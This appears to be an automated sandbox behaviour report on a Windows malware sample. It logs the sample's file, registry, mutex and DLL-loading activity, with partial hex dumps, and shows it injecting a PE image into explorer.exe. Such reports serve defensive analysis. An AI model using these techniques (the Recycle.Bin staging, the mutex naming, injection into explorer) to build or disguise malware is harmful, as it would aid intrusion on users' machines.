File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077616092
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077617059
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077618890
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077628323
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077688542
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077694458
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077716296
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077724477
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077726408
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077727299
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2105181057
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2105181961
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2105186793
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2105188019
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106050990
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106062448
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106064892
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106065760
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106141651
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106142943
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106146130
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106147197
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106173327
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106174496
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106269444
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106270267
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106530383
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106531538
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106534722
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106535513
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106834743
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106836002
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106839763
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106840663
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106843147
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106843932
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106929386
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106931102
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107703898
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107704731
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107708174
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107708975
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107711363
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107712149
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107714611
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107715317
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107717398
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107718185
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107720565
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107721354
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107723432
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107724219
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107726547
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107727332
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107729482
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107730270
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108251639
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108254055
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108260981
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108262331
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108266115
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108267075
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108269502
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108270286
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108330747
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108332558
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108337032
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108338179
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108429455
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108430171
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108541181
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108541970
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108798383
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108799196
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108812811
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108813610
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108883421
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108884227
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108889101
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108889893
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2109007279
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2109008125
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110281978
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110286620
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110288190
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110288519
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110289801
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110290170
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110291213
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110291539
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110292393
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110292718
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110294005
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110576007
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110642959
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110644098
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110709174
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110710935
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110785210
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110801523
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111548591
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111550471
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111551484
Thread delayed Time: 80 TID: 8584 success or wait 2111552008
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397920540
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397934441
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397937349
Analysis File: B6232F3AC2C.exe PID: 2444 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:02
Start date: 01/12/2011
Path: C:\Recycle.Bin\B6232F3AC2C.exe
Commandline: C:\Recycle.Bin\B6232F3AC2C.exe
Imagebase: 0x400000
File size: 254976 bytes
MD5 hash: 62D0915F2D31D0A060671D31419A0B80
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 5 403AA1
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 C44E4E
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 C44E4E
\pipe\globpluginsuninstallpipe read attributes and synchronize and generic write synchronous io non alert and non directory file false object name not found 1 C271FC
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 C26A36
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident object name collision 1 BD0179
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C44E4E
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 1 C44E17
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 1 C3818F
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 1 C26699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 C266D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1 C26717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1 C267A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 4 C2667A
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\crypt32.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\msimg32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\wininet.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\winmm.dll write and read and execute unknown 330000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 950000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 950000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 950000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3B0000 4096 own pid readonly success or wait 1
\BaseNamedObjects\DBWIN_BUFFER write unknown C70000 1007616 own pid readonly object name not found 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
\KnownDlls\WS2_32.dll write and read and execute unknown C20000 1007616 own pid readonly object name not found 1 402365
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 402365
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 402365
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 402365
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C70000 1007616 own pid readonly image not at base 1 C31D35
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C70000 1007616 own pid readonly image not at base 1 C31D35
C:\WINDOWS\system32\ntdll.dll query and read commit BD0000 65536 own pid readonly success or wait 1 C26A8A
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1 BD0897
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\System64 success or wait 1 40347C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe success or wait 1 404F44
2444 C:\Recycle.Bin\B6232F3AC2C.exe success or wait 0 404F44
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 C2764B
1636 C:\WINDOWS\explorer.exe BADAFFC 13 B8 00 00 EB 0A 50 BA 50 16 AF 0B FF D2 success or wait 1 C418F5
